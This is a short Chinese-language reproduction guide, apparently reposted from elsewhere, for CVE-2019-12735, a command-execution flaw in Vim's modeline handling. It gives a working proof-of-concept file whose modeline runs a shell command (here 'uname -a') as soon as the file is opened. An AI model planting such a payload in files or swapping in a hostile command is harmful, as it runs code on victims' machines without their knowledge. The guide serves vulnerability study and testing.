CVE-2019-12735 VIM命令執行漏洞利用


操作系統:Kali Linux

VIM版本:VIM - Vi IMproved 8.1.693 (2018 May 18, compiled Jan 05 2019 20:53:12)

因為vim默認關閉modeline,所以首先要手工設置modeline。

第1步:開啟modeline

在用戶家目錄(如:/root/)下創建.vimrc文件,文件內容為:

set modeline

第2步:創建poc.txt

創建poc.txt,文件內容為:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

第3步:打開poc.txt

使用vim打開poc.txt即可看到uname命令的執行結果。

這個漏洞比較雞肋的一點就是vim默認不開啟modeline,所以漏洞影響范圍有一定局限性。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM